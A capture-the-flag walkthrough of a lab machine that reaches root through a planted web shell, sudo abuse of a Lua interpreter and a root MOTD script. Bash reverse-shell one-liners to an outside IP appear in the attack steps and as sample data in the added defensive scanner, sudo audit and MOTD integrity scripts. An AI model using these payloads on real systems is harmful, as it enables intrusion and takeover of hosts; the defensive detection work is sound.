The process begins by finding a web shell already present on the box and using it to get a reverse shell. Then we pivot to another user, and own user, by abusing a Lua runtime. Finally, by exploiting a cleanup script running as root, we obtain a root shell.
Nmap scan
Usually I start with an nmap scan:
nmap -sV -sC 10.10.10.181 -v
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
| 256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_ 256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We have SSH and HTTP open.
Web enumeration
Checking the website:
Seems like this box has something to do with web shells.
Running dirbuster didn't return anything useful, so I took a look at the page source:
<body>
<center>
<h1>This site has been owned</h1>
<h2>I have left a backdoor for all the net. FREE INTERNETZZZ</h2>
<h3> - Xh4H - </h3>
<!--Some of the best web shells that you might need ;)-->
</center>
</body>
Xh4H (the box creator) left a hint: "Some of the best web shells that you might need".
Searching for "Xh4H web shells", I found a tweet that led to a list of web shells published by this user.
Trying each filename against the box URL, smevk.php worked!
Going to: http://10.10.10.181/smevk.php
It's a login page; trying default creds (admin:admin) allowed me to log in.
Getting first shell
There is a browse option. Since we know the server executes PHP, let's upload a simple PHP reverse shell:
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.16.81/1234 0>&1'");
?>
Save it as rev.php, browse for it, then click on the >> symbol to upload the shell.
Now rev.php appears in the file manager.
Listen on port 1234 (don't forget to change the IP and port in rev.php to your own):
rlwrap nc -vlp 1234
To execute the reverse shell, just visit http://10.10.10.181/rev.php
And we get a shell back!
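From the defender's side, the two artifacts above (a third-party web shell dropped in the document root and a one-line PHP reverse shell) are easy to spot with a content scan. The following is an added example, not code from the original writeup: a small scanner that walks a web root and reports PHP files matching exec-family calls, eval of request data, /dev/tcp connect-back strings and similar markers. The helper names (scan_file, scan_webroot, build_sample_webroot) and the sample files are constructed for the demonstration; the stand-in "upload.php" is not the content of the real smevk.php.

```python
"""Added example: flag PHP files in a web root that look like web shells or
reverse shells. Sample files are constructed in a temp directory."""
import os
import re
import tempfile

# Markers a defender would grep for. Each entry is (finding name, compiled regex).
SUSPICIOUS_PATTERNS = [
    ("exec-family call",
     re.compile(r"\b(exec|shell_exec|system|passthru|popen|proc_open)\s*\(", re.I)),
    ("eval of request data",
     re.compile(r"\beval\s*\(.*\$_(GET|POST|REQUEST|COOKIE)", re.I)),
    ("/dev/tcp reverse shell",
     re.compile(r"/dev/tcp/\d{1,3}(\.\d{1,3}){3}/\d+")),
    ("base64-decoded payload",
     re.compile(r"base64_decode\s*\(", re.I)),
    ("web shell banner",
     re.compile(r"(web\s*shell|backdoor)", re.I)),
]


def scan_file(path):
    """Return the names of all patterns that match the file's contents."""
    with open(path, "r", errors="replace") as fh:
        data = fh.read()
    return [name for name, rx in SUSPICIOUS_PATTERNS if rx.search(data)]


def scan_webroot(root, extensions=(".php", ".phtml", ".php5")):
    """Walk a document root; return {relative_path: [findings]} for files that hit."""
    findings = {}
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            if not fn.lower().endswith(extensions):
                continue
            full = os.path.join(dirpath, fn)
            hits = scan_file(full)
            if hits:
                findings[os.path.relpath(full, root)] = hits
    return findings


def build_sample_webroot():
    """Construct a throwaway web root: one benign page, the rev.php one-liner from
    the writeup, and a constructed file-manager style shell (not the real smevk.php)."""
    root = tempfile.mkdtemp(prefix="webroot-")
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write("<?php echo 'Help us'; ?>\n")
    with open(os.path.join(root, "rev.php"), "w") as fh:
        fh.write("<?php\nexec(\"/bin/bash -c 'bash -i >& /dev/tcp/10.10.16.81/1234 0>&1'\");\n?>\n")
    with open(os.path.join(root, "upload.php"), "w") as fh:
        fh.write("<?php // constructed web shell stand-in\n"
                 "$out = shell_exec($_POST['cmd']);\n?>\n")
    return root


if __name__ == "__main__":
    for path, hits in sorted(scan_webroot(build_sample_webroot()).items()):
        print(f"{path}: {', '.join(hits)}")
```

Run it against the real document root (for example `scan_webroot("/var/www/html")`) from a cron job or a file-integrity hook; the benign index page produces no findings, while both dropped files are reported with the specific marker that matched.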
Own user
Before doing any work, it's better to upgrade the shell first:
python -c 'import pty;pty.spawn("/bin/bash")'
Enumeration
Searching the home directory of the webadmin user, I found a note.txt:
- sysadmin -
I have left a tool to practice Lua.
I'm sure you know where to find it.
Contact me if you have any question.
It's a message from the sysadmin user; it looks like there is a tool that executes Lua code.
Running sudo -l reveals that webadmin can execute the luvit binary as sysadmin without a password.
After searching for how to execute a system command from Lua, I found a simple way: os.execute.
Creating a lua shell:
echo "local t = os.execute('/bin/sh')" > rev.lua
Now executing the command:
sudo -u sysadmin /home/sysadmin/luvit rev.lua
Got a shell as user sysadmin!
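The sudo rule that enabled this pivot is exactly the kind of thing a hardening audit should catch: a NOPASSWD rule whose target is an interpreter (which can always spawn a shell, as os.execute does here) and which lives under a user's home directory. The following is an added example, not code from the original writeup: it parses the "may run the following commands" section of `sudo -l` output and reports why each rule deserves review. The helper names (parse_sudo_l, assess, audit), the interpreter list and the sample output are assumptions; the first sample rule mirrors the one on the box, the second is constructed as a benign comparison.

```python
"""Added example: audit `sudo -l` output for rules a defender should review.
Sample output is constructed; the hostname is a placeholder."""
import re

# Binaries that can run arbitrary code (and therefore a shell) as the run-as user.
INTERPRETERS = {"luvit", "lua", "luajit", "python", "python3", "perl",
                "ruby", "node", "php", "bash", "sh"}

# Matches lines like "(sysadmin) NOPASSWD: /home/sysadmin/luvit".
RULE_RX = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")

SAMPLE_SUDO_L = """\
Matching Defaults entries for webadmin on host:
    env_reset, mail_badpass

User webadmin may run the following commands on host:
    (sysadmin) NOPASSWD: /home/sysadmin/luvit
    (root) /usr/bin/apt-get update
"""


def parse_sudo_l(text):
    """Return a list of {runas, tags, command} dicts from `sudo -l` output."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line.strip():
            continue
        m = RULE_RX.match(line)
        if not m:
            continue
        tags = {t.strip(":") for t in m.group("tags").split()}
        for cmd in m.group("cmds").split(","):
            rules.append({"runas": m.group("runas"), "tags": tags,
                          "command": cmd.strip()})
    return rules


def assess(rule):
    """Return human-readable reasons this rule should be reviewed (empty if none)."""
    findings = []
    binary = rule["command"].split()[0]
    name = binary.rsplit("/", 1)[-1]
    if "NOPASSWD" in rule["tags"]:
        findings.append("NOPASSWD: no authentication required")
    if binary == "ALL":
        findings.append("ALL: unrestricted command")
    if name in INTERPRETERS:
        findings.append(f"interpreter {name}: can run arbitrary code as {rule['runas']}")
    if binary.startswith("/home/"):
        findings.append("binary under /home: its owner can replace it")
    return findings


def audit(text):
    """Map each command in the sudo rules to its list of findings."""
    return {r["command"]: assess(r) for r in parse_sudo_l(text)}


if __name__ == "__main__":
    for cmd, findings in audit(SAMPLE_SUDO_L).items():
        print(cmd, "->", findings or "ok")
```

Feed it the output of `sudo -l` (or `sudo -l -U <user>` as root) for each account; the luvit rule is reported on all three counts, while the fixed-path apt-get rule comes back clean. The fix on the defender's side is to drop the NOPASSWD tag, or better, not to grant sudo to an interpreter at all.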
Own root
Enumeration
pspy64 shows a command running as root: the system copies the files in /var/backups/.update-motd.d/ to /etc/update-motd.d/ every 30 seconds.
After a while, I noticed that the scripts in /etc/update-motd.d/ are executed on every SSH login, and the commands in 00-header run as root.
Get a shell as root
I've added a bash reverse shell to 00-header:
echo "/bin/bash -c 'bash -i >& /dev/tcp/10.10.16.81/4444 0>&1'" >> /etc/update-motd.d/00-header
Listening on port 4444 and SSHing to the box from another terminal returned a root shell.
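The root cleanup job restores /etc/update-motd.d/ from the backup every 30 seconds, but that still leaves a window in which a modified 00-header runs as root on the next login. A defender would rather alert on any drift from the trusted copy, and on any MOTD script that is not owned by root or is writable by others. The following is an added example, not code from the original writeup: an integrity check that compares a live directory against a reference directory by SHA-256 and inspects ownership and mode. The helper names (sha256_file, check_motd, build_demo, demo) are assumptions, and the directories are constructed in temp dirs with the appended line from this writeup standing in for the tampering.

```python
"""Added example: integrity and permission check for MOTD scripts.
Directories are constructed in temp dirs; run against /etc/update-motd.d and
/var/backups/.update-motd.d on a real host."""
import hashlib
import os
import stat
import tempfile

HEADER = ("#!/bin/sh\n[ -r /etc/lsb-release ] && . /etc/lsb-release\n"
          "printf 'Welcome to %s\\n' \"$DISTRIB_DESCRIPTION\"\n")


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def check_motd(live_dir, reference_dir, expected_uid=0):
    """Compare live scripts with the trusted reference; return a list of alerts."""
    alerts = []
    live = {f for f in os.listdir(live_dir) if os.path.isfile(os.path.join(live_dir, f))}
    ref = {f for f in os.listdir(reference_dir) if os.path.isfile(os.path.join(reference_dir, f))}
    for name in sorted(ref - live):
        alerts.append(f"{name}: missing from live directory")
    for name in sorted(live - ref):
        alerts.append(f"{name}: unexpected script not in reference")
    for name in sorted(live & ref):
        lp, rp = os.path.join(live_dir, name), os.path.join(reference_dir, name)
        if sha256_file(lp) != sha256_file(rp):
            alerts.append(f"{name}: content differs from reference")
    for name in sorted(live):
        st = os.stat(os.path.join(live_dir, name))
        if st.st_uid != expected_uid:
            alerts.append(f"{name}: owned by uid {st.st_uid}, expected {expected_uid}")
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            alerts.append(f"{name}: writable by group or others")
    return alerts


def build_demo():
    """Construct a reference dir and a tampered live dir (constructed data)."""
    ref = tempfile.mkdtemp(prefix="motd-ref-")
    live = tempfile.mkdtemp(prefix="motd-live-")
    for d in (ref, live):
        with open(os.path.join(d, "00-header"), "w") as fh:
            fh.write(HEADER)
        os.chmod(os.path.join(d, "00-header"), 0o755)
    # Simulate the tampering from the writeup: a line appended to the live copy,
    # on a file that has been left group-writable.
    with open(os.path.join(live, "00-header"), "a") as fh:
        fh.write("/bin/bash -c 'bash -i >& /dev/tcp/10.10.16.81/4444 0>&1'\n")
    os.chmod(os.path.join(live, "00-header"), 0o775)
    return live, ref


def demo():
    """Run the check on the constructed dirs; returns (tampered_alerts, clean_alerts)."""
    live, ref = build_demo()
    uid = os.stat(ref).st_uid  # temp files are owned by the current user, not root
    return check_motd(live, ref, expected_uid=uid), check_motd(ref, ref, expected_uid=uid)


if __name__ == "__main__":
    tampered, clean = demo()
    print("tampered:", tampered)
    print("clean:", clean)
```

On a real host, call `check_motd("/etc/update-motd.d", "/var/backups/.update-motd.d")` with the default expected_uid of 0 and ship any non-empty result to your alerting; a drift alert every 30 seconds is far more useful than a silent restore. The lasting fix is to make sure no non-root account can write to /etc/update-motd.d in the first place.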
Finally, the box is rooted :). Your feedback is appreciated!